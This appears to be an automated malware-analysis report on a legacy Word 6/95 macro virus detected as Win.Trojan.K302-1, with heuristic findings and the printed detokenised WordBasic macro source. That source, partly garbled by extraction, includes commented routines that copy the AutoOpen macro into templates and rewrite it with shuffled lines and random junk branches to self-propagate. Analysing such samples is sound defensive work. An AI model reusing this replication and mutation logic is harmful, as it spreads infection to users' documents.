MALICIOUS
Risk Score: 102
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample is identified as a legacy macro virus by heuristics and ClamAV, specifically Win.Trojan.K302-1. The embedded WordBasic macro code, including functions like 'AutoOpen' and 'k3', suggests an intent to copy and potentially execute malicious routines. The presence of the 'RSN MACRO VIRUS' marker further supports its classification as a macro-based threat.
Heuristics (3)
- ClamAV: Win.Trojan.K302-1 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Win.Trojan.K302-1
- Legacy WordBasic macro-virus markers [high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS]: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- Recovered legacy WordBasic macro source [info, OLE_LEGACY_WORDBASIC_MACRO_SOURCE]: The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| wordbasic_macros.txt | wordbasic-macro | analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) | 2210 bytes |

SHA-256: 0da7c301aadf99af4d85cda17e0ea8b42fc587e8972f01c1f94bdc00da9619b4

Preview script: first 1,000 lines of the extracted script
,
@cmd2862 ,
29541 + , 25971 , + 28019 ,
,
25441
, 25441 , 25441 3436
,
main
i = 1
@cmd80b7 1 = 0 whcp = 3
@cmd80b7 1 0 whcp = 1
@cmd8111 0
d$ = @cmd8005 77
b$ = @cmd8025 = @cmd8005 58
c$ = @cmd8005 67
i = 1 a$ = @cmd80be d$
i = 1 @cmd00d7 = c$ , , = 1
@cmd8012 a$
i = 1 @cmd809f 1
i = 1 c @cmd0562 b$ , whcp
* L
@cmd00d7 = c$ , , = 1
main
REM sub k3(fnm$,wh)
REM f1$ = "AutoOpen"
29551
REM f3$ = "m" : p$ = Chr$(13)
REM if wh=3 then
REM MacroCopy f1$, fnm$ + f1$
, +
REM MacroCopy f3$, fnm$ + f3$
REM else
REM MacroCopy fnm$ + f1$,f1$
+ ,
REM MacroCopy fnm$ + f3$,f3$
REM end if
REM macupd(wh)
REM docclose 2
REM End Sub
REM Function rnum(nst, nend)
REM rnum = Int(Rnd() * ((nend + 1) - nst) + nst)
REM End Function
REM Sub macupd(dest)
REM screenupdating 0
REM Dim m1all$(20)
REM Dim m1to4$(10)
REM m1all$(1) = "i = 1"
REM m1all$(2) = "c$ = Chr$(67)"
REM m1all$(3) = "b$ = FileName$() + chr$(58)"
REM m1all$(4) = "ScreenUpdating 0"
REM m1all$(5) = "If CountMacros(1) = 0 Then whcp = 3"
REM m1all$(6) = "If CountMacros(1) > 0 Then whcp = 1"
REM m1all$(7) = " d$ = Chr$(77) "
REM cnt = 7
REM m1all$(11) = " a$ = MacroDesc$(d$)"
REM m1all$(12) = " ToolsMacro .Name = c$, .Edit, .Show = 1 "
REM m1all$(13) = "Insert a$"
REM m1all$(14) = "DocClose 1"
REM m1all$(15) = "c.gb(b$, whcp)"
REM m1all$(16) = "ToolsMacro .Name = c$, .Delete, .Show = 1 "
REM For i = 1 To cnt
REM lab1:
REM k = rnum(1, cnt)
REM If m1to4$(k) <> "" Then
REM Goto lab1
REM Else
REM m1to4$(k) = m1all$(i)
REM End If
REM Next i
REM For i = 1 To cnt
REM a$ = a$ + m1to4$(i) + Chr$(13)
REM Next i
REM For i = 11 To 16
REM selcrit = rnum(1, 4)
REM Select Case selcrit
REM Case 2
REM asel$ = "if i=1 then "
REM Case 3
REM asel$ = "if i>0 then "
REM Case 4
REM asel$ = "goto " + Chr$(60 + i) + ":" + Chr$(13) + Chr$(60 '+ i) + ":" + Chr$(13)
REM Case Else
REM asel$ = ""
REM End Select
REM a$ = a$ + asel$ + m1all$(i) + Chr$(13)
REM Next i
REM ToolsMacro .Name = "m", .Show = dest, .Edit
REM editselectall
REM editcut
REM Insert "sub main"+ Chr$(13)+a$+"end sub"
REM docclose 1
REM End Sub
MAIN
m